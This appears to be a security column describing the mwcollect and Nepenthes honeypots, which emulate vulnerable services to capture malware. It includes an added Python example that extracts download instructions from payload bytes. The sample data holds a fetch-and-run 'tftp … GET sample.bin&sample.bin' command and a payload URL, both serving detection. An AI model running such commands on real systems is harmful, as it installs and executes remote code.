Over the last two weeks, I've written about proactive honeypots that seek out malicious Web sites, two of which are unavailable to the public and one of which you can download to run on your own networks. If you missed either of those articles, they're available on our Web site at the URLs below. This week, I'll discuss two "passive" honeypots--that is, honeypots that sit waiting for intrusion attempts.
Because honeypots present an attack point for potential intruders, they're useful in determining what sort of intrusion attempts are being launched against your network. In some cases, they can detect intrusion methods that are completely unknown to even the most up-to-date Intrusion Detection Systems (IDSs).
I recently learned about two new honeypots. The first is mwcollect (at the URL below), which was released in April 2005 and is partially funded by The Honeynet Project. Mwcollect is designed specifically to collect malware--thus the "mw" prefix in the mwcollect name. The tool runs on Linux and OpenBSD and can also run on Cygwin, a Linux environment that runs on Windows platforms.
Mwcollect is a little different from typical honeypots because it was originally designed to collect bot software, but the current version collects worms and other forms of malware that take advantage of vulnerabilities that mwcollect exposes. According to the mwcollect Web site, systems that run the tool can't be infected with malware due to the way mwcollect operates internally. It binds to specified ports, waits for an exploit attempt, scans for shell code, and tries to download any related malware. Captured malware can then be added to a database at the mwcollect Web site.
The next version of mwcollect will allow three levels of network interactivity. The first level is the same as I describe above. The second level will passively analyze network traffic (like a sniffer in promiscuous mode would) and will try to download any related malware. The third, or lowest, level of interactivity will also passively analyze network traffic but won't try to download related malware. You can learn a little more about the tool at the Web site and join an Internet Relay Chat (IRC) channel for further discussion.
The second new honeypot, Nepenthes, was released earlier this month and is similar to mwcollect. It too presents known vulnerabilities to the network and waits for intrusion attempts. Current modules for Nepenthes allow it to emulate vulnerabilities in DCOM, Local Security Authority Service (LSASS), WINS, ASN.1, NetBIOS, SQL Server, and many other Microsoft services. Because Nepenthes runs on Linux systems, none of those services would actually be available, which means exploits against them would have little or no effect on the underlying OS.
Just like mwcollect, when Nepenthes detects intrusion attempts, it tries to download any related malware through a variety of methods including FTP, Trivial FTP (TFTP), and HTTP. Captured malware is then sent to a central server hosted by the developers of the tool.
Documentation for Nepenthes doesn't explain what goes on under the hood. But as best I can determine (I haven't actually installed the tool yet), it captures shell-code exploits; looks for instructions that try to download code from the Internet (which many types of malware have); and if it finds such instructions, proceeds to try to download the malware in accordance with the intruder's intent--for example, if the captured code indicates that the system should use FTP to download a file, Nepenthes will try to do that. I suspect that mwcollect works in a similar fashion. Nepenthes doesn't appear to run on Windows platforms using Cygwin, so you'll probably need a Linux-based system to put it to use on your networks.
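The step described above, pulling download instructions out of a captured payload, is shown here as an added Python example; it is not code from Nepenthes or mwcollect. The patterns, the function name, and the sample bytes (documentation-only addresses and made-up file names) are assumptions constructed for illustration, and the code only reports what a collector would queue without fetching anything.

```python
import re

# Runs of 6+ printable ASCII bytes, the same idea as the Unix `strings` tool.
PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")

# Illustrative patterns for the transfer methods the article names (assumed,
# not the signatures either honeypot ships).
URL = re.compile(r"\b(https?|ftp)://([A-Za-z0-9.-]+)(?::(\d+))?(/[^\s&|;]*)?", re.I)
TFTP = re.compile(r"\btftp(?:\.exe)?\s+-i\s+(\S+)\s+get\s+([^\s&|;]+)", re.I)
DEFAULT_PORT = {"http": 80, "https": 443, "ftp": 21, "tftp": 69}


def extract_download_instructions(payload: bytes) -> list:
    """List the fetches a captured payload asks for. Nothing is downloaded."""
    found = []
    for run in PRINTABLE.finditer(payload):
        text = run.group().decode("ascii")
        for m in URL.finditer(text):
            proto = m.group(1).lower()
            found.append({"proto": proto, "host": m.group(2),
                          "port": int(m.group(3) or DEFAULT_PORT[proto]),
                          "path": m.group(4) or "/"})
        for m in TFTP.finditer(text):
            found.append({"proto": "tftp", "host": m.group(1),
                          "port": DEFAULT_PORT["tftp"], "path": m.group(2)})
    unique = []  # de-duplicate, keeping first-seen order
    for item in found:
        if item not in unique:
            unique.append(item)
    return unique


# Constructed sample: non-printable filler around two command strings, using
# RFC 5737 documentation addresses and made-up file names.
FILLER = bytes(range(0x80, 0x90))
SAMPLE = (FILLER + b"cmd /c tftp -i 192.0.2.10 GET sample.bin&sample.bin\x00"
          + FILLER + b"http://198.51.100.7:8080/files/sample2.bin\x00")

if __name__ == "__main__":
    for instruction in extract_download_instructions(SAMPLE):
        print(instruction)
```

In a collector, each returned entry would be handed to a protocol-specific downloader running in an isolated environment, with the payload and the fetched file hashed and logged together.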
If you use honeypots, as do so many administrators these days, be sure to take a closer look at mwcollect and Nepenthes.